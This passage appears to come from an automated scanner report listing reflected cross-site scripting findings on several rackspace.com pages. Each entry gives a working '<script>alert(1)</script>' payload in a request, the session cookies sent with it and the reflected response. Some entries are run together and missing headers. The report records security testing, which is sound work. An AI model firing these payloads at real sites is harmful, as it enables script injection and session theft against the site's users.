GET /managed_hosting/private_cloud/index.php?f7dbf"><script>alert(1)</script>cc934d41c56=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/private_cloud/index.php?f7dbf"><script>alert(1)</script>cc934d41c56=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a425300ec182657b7e0','custclient','width=500,height=320');return fal ...[SNIP]...
4.163. http://www.rackspace.com/managed_hosting/richmedia/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/richmedia/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 764d0"><script>alert(1)</script>1bd771bb9f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/richmedia/index.php?764d0"><script>alert(1)</script>1bd771bb9f6=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ck="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/richmedia/index.php?764d0"><script>alert(1)</script>1bd771bb9f6=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a425300ec182657b7e0','custclient','width=500,height=320');return fal ...[SNIP]...
4.164. http://www.rackspace.com/managed_hosting/saas/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/saas/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67034"><script>alert(1)</script>f7308fd8519 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/saas/index.php?67034"><script>alert(1)</script>f7308fd8519=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/saas/index.php?67034"><script>alert(1)</script>f7308fd8519=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a423706ce3acae18c89','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.165. http://www.rackspace.com/managed_hosting/services/database/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/services/database/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff3c9"><script>alert(1)</script>f4dd8f3841d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/database/index.php?ff3c9"><script>alert(1)</script>f4dd8f3841d=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/services/database/index.php?ff3c9"><script>alert(1)</script>f4dd8f3841d=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.166. http://www.rackspace.com/managed_hosting/services/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/services/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7830c"><script>alert(1)</script>662736478fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/index.php?7830c"><script>alert(1)</script>662736478fa=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e97"><script>alert(1)</script>796d58113c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/proservices/criticalsites.php?42e97"><script>alert(1)</script>796d58113c8=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... on('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/services/proservices/criticalsites.php?42e97"><script>alert(1)</script>796d58113c8=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.168. http://www.rackspace.com/managed_hosting/services/proservices/disasterrecovery.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c1d4"><script>alert(1)</script>ec9df87e08c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/proservices/disasterrecovery.php?5c1d4"><script>alert(1)</script>ec9df87e08c=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22c4c"><script>alert(1)</script>ce8be8e7e0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/proservices/sharepoint.php?22c4c"><script>alert(1)</script>ce8be8e7e0a=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... utton('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/services/proservices/sharepoint.php?22c4c"><script>alert(1)</script>ce8be8e7e0a=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.170. http://www.rackspace.com/managed_hosting/services/security/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/services/security/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aaa7"><script>alert(1)</script>0cad41b1b9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/security/index.php?2aaa7"><script>alert(1)</script>0cad41b1b9a=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/services/security/index.php?2aaa7"><script>alert(1)</script>0cad41b1b9a=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.171. http://www.rackspace.com/managed_hosting/services/storage/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/services/storage/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eec7e"><script>alert(1)</script>02a979d343b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/storage/index.php?eec7e"><script>alert(1)</script>02a979d343b=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ck_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/services/storage/index.php?eec7e"><script>alert(1)</script>02a979d343b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.172. http://www.rackspace.com/managed_hosting/support/customers/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/support/customers/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 637f5"><script>alert(1)</script>4561d53e9ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
